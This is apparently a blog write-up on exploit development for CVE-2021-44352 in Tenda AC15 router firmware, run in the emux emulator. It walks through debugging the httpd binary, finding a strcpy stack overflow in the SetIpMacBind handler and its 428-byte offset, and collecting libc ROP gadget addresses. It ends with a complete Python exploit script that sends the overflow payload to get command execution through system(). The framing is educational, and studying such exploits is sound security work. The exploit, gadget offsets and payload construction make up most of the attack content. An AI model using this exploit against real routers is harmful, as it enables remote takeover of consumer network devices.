[Router Exploit] Exploit Tenda ac15 - CVE-2021-44352
In this article, we’ll dive into the Tenda AC15 firmware (AC15 V15.03.05.18_multi device). It’s been a while since my last post, and this 2-day research project makes for an easy read! While browsing the internet out of boredom during New Year’s celebrations, I stumbled upon a repository called emux
. I’ve always been curious about reverse engineering routers, and emux
(a tool for emulating firmware) seemed incredibly handy (https://github.com/therealsaumil/emux). Curiosity sparked, and after a day of wrestling with setups, here we are!. Using a known CVE is always a good starting point for learning exploit development. In this article, I focus on CVE-2021-44352
and cover environment setup, debugging, and crafting an exploit script.
First, clone the emux
git clone https://github.com/therealsaumil/emux
Ensure Docker is installed, then set up the volume:
Build the Docker image:
Once everything is ready, start the environment:
Access the shell:
Now, launch the firmware:
$ launcher
Choose Tenda AC15 WiFi Router and access the admin portal at:
Now you can access the tenda admin portal by accessing
Log in using the password ringzer0
. Thanks to emux for making this setup a breeze!
I assume you have setting up everything, and able to reach the tenda admin portal.
Now we can find the httpd
PID by running emuxps
thanks to emux
$ emuxps | grep httpd
Remember to run above command on emux-docker
Now you can attach the httpd
PID to gdb by using emuxgdb
once again, thanks to emux
$ emuxgdb 15457
Now we should be able to debug the httpd
Dynamic Analysis
After reading the CVE-2021-44352 (https://nvd.nist.gov/vuln/detail/CVE-2021-44352), we can see that the vulnerability is on /goform/SetIpMacBind
, from this information we can only focus on this PATH, and the vulnerability parameter is on list
since we don’t know what is the other parameter on this PATH so we should find the correct parameter.
I use grep
to find SetIpMacBind
string inside webroot folder, and found there’s a source code inside ./js/ip_mac_bind.js
mentioned SetIpMacBind
I found the required parameter based on file ./js/ip_mac_bind.js
, it’s required bindnum
and list
then check the httpd
binary using ghidra, there is a function called fromSetIpMacBind
which processing our input parameter bindnum
and list
, and there’s a strcpy
Since we are able to identify the function handler inside the httpd
binary now it’s time for debugging. I use the same method as I explain on the Debugging Section, and I use pattern create
to find the right offset. After setup the break point address at 0x8b2f8
we got segfault.
Now I am able to overwrite the %pc
register and found the offset 428
Last piece, we need to collect all gadget required to craft the ROP Chain and obtain RCE, due to lack of PIE and ASLR, we can use a static address offset of libc to calculate the required gadget, you can use tools like objdump to find gadgets.
base_libc = 0x40202000
system_offset = 0x0005a270
libc_system = base_libc + system_offset
gadget1 = base_libc + 0x00018298 # pop {r3, pc}
gadget2 = base_libc + 0x00040cb8 # mov r0, sp
Let’s finalize the exploit script.
from lib.http import HTTP
from pwn import *
# ip = ""
ip = "localhost"
port = "20080"
# Break point
# 0x8afb0 (main)
# 0x8b2f8 (strcpy)
def POC():
# initialize connection
http_driver = HTTP(ip, port)
http_driver.login_tenda("admin", "ringzer0")
print("test network:", http_driver.test_network())
# making buffers
# p = b"aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae"
cmd = b'echo "tripoloski here :P, executing uname: `uname -a`"'
base_libc = 0x40202000
system_offset = 0x0005a270
libc_system = base_libc + system_offset
gadget1 = base_libc + 0x00018298 # pop {r3, pc}
gadget2 = base_libc + 0x00040cb8 # mov r0, sp
p = b'A' * (428) + p32(gadget1) + p32(libc_system) + p32(gadget2) + cmd
data = {
"bindnum": 1,
"list": p
SetIpMacBind = http_driver.make_post("/goform/SetIpMacBind", data)
print("response from vulnerable endpoint: ", SetIpMacBind.text)
if __name__ == "__main__":
# print(x)
Run the exploit and we got the shell